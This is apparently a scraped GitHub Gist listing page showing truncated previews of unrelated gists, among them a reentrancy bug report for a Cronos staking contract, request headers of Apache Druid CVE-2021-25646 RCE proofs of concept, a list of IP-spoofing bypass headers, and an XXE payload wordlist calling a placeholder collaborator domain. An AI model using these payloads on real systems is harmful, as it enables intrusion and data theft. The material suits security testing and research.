
@fatherGoose1
fatherGoose1 / cronos-reentrancy.md
Created March 22, 2024 16:43
Bug report of Tectonic (Cronos) reentrancy to mint tokens at 100x actual rate.

Bug Description

There is a reentrancy vulnerability in TectonicStakingPoolV3.sol (https://cronoscan.com/address/0xE165132FdA537FA89Ca1B52A647240c2B84c8F89).

The issue arises due to the function performConversionForTokens() which is currently open for anyone to call because tcmPublicAccess is currently true. During a call to performConversionForTokens(), reentrancy can be achieved with the end result being the free minting of xTonic tokens. A brief description of the token conversion process:

  • The staking pool contract holds predominantly TONIC.
  • Other approved tokens held by the staking pool can be swapped for TONIC. For example, if the pool holds some WCRO, it can be swapped for TONIC using performConversionForTokens() which increases the contract's TONIC balance, thus increasing rewards for its stakers.
  • Upon successful conversion, any extra TONIC that was received during the swap (more than the oracle quote) is sent to the function caller as a reward.

The issue with the above is that a caller can

@shariqmalik
shariqmalik / Configure_WSA_for_Pentest.md
Last active April 21, 2024 13:30
Configure WSA (Windows Subsystem for Android) for Pentest
@shariqmalik
shariqmalik / oneliner_aws_temp_creds_generator.md
Last active August 28, 2023 18:08
One-liners to generate formatted temporary AWS STS credentials based on a preconfigured AWS profile

One-liners to generate formatted temporary AWS STS credentials based on a preconfigured AWS profile.

For Windows (PowerShell)

aws sts get-session-token --duration-seconds (Read-Host -Prompt "Session Duration") --serial-number (Read-Host -Prompt "Serial Number") --token-code (Read-Host -Prompt "MFA code") | ConvertFrom-Json | %{$_.Credentials} | %{@{aws_access_key_id=$_.AccessKeyId;aws_secret_access_key=$_.SecretAccessKey;aws_session_token=$_.SessionToken}} | ConvertTo-Json -Compress | %{$_ -replace "{","`n`n[profile-name]`n"} | %{$_ -replace "}",""} |  %{$_ -replace ":"," = "} | %{$_ -replace '"',""} |  %{$_ -replace",","`n"} | %{$_ -replace "profile-name", (Read-Host -Prompt "Profile Name")} | tee -Variable _ | Add-Content $HOME\.aws\credentials

For Linux (bash)

@perXautomatik
perXautomatik / Disclaimer.md
Last active August 15, 2022 10:28
Full Windows [SYSTEM cleanup script] - Script Center - Spiceworks

This script has not been checked by Spiceworks. Please understand the risks before using it.

To install Docker on Debian as root:
1) apt-get update
2) apt-get install ca-certificates curl gnupg lsb-release
3) curl -fsSL https://download.docker.com/linux/debian/gpg | gpg --dearmor -o /usr/share/keyrings/docker-archive-keyring.gpg
4) echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker-archive-keyring.gpg] https://download.docker.com/linux/debian \
$(lsb_release -cs) stable" | tee /etc/apt/sources.list.d/docker.list > /dev/null
5) apt-get update
6) apt-get install docker-ce docker-ce-cli containerd.io
@ahbanavi
ahbanavi / encryption.php
Last active May 1, 2024 23:18
Encrypt / Decrypt JSON data between Python and PHP using AES 256 GCM
<?php
const PASSPHRASE = ''; // use 'openssl rand -hex 32' to generate key, same with python
function encrypt(array $data): string
{
$data_json_64 = base64_encode(json_encode($data));
$secret_key = hex2bin(PASSPHRASE);
$iv = openssl_random_pseudo_bytes(openssl_cipher_iv_length('aes-256-gcm'));
$tag = '';
$encrypted_64 = openssl_encrypt($data_json_64, 'aes-256-gcm', $secret_key, 0, $iv, $tag);
@pikpikcu
pikpikcu / CVE-2021-25646.md
Last active January 10, 2022 12:32
CVE-2021-25646
POST /druid/indexer/v1/sampler?for=example-manifest HTTP/1.1
Host: REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json
Content-Length: 1006
Connection: close
@0xf4n9x
0xf4n9x / CVE-2021-25646 POC
Created February 2, 2021 15:21
CVE-2021-25646 Apache Druid RCE POC
POST /druid/indexer/v1/sampler HTTP/1.1
Host: x.x.x.x:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json
Content-Length: 1045
Connection: close
@kaimi-
kaimi- / gist:6b3c99538dce9e3d29ad647b325007c1
Last active May 2, 2024 08:29
Possible IP Bypass HTTP Headers
CACHE_INFO: 127.0.0.1
CF_CONNECTING_IP: 127.0.0.1
CF-Connecting-IP: 127.0.0.1
CLIENT_IP: 127.0.0.1
Client-IP: 127.0.0.1
COMING_FROM: 127.0.0.1
CONNECT_VIA_IP: 127.0.0.1
FORWARD_FOR: 127.0.0.1
FORWARD-FOR: 127.0.0.1
FORWARDED_FOR_IP: 127.0.0.1
@honoki
honoki / xxe-payloads.txt
Last active March 27, 2024 18:49
XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y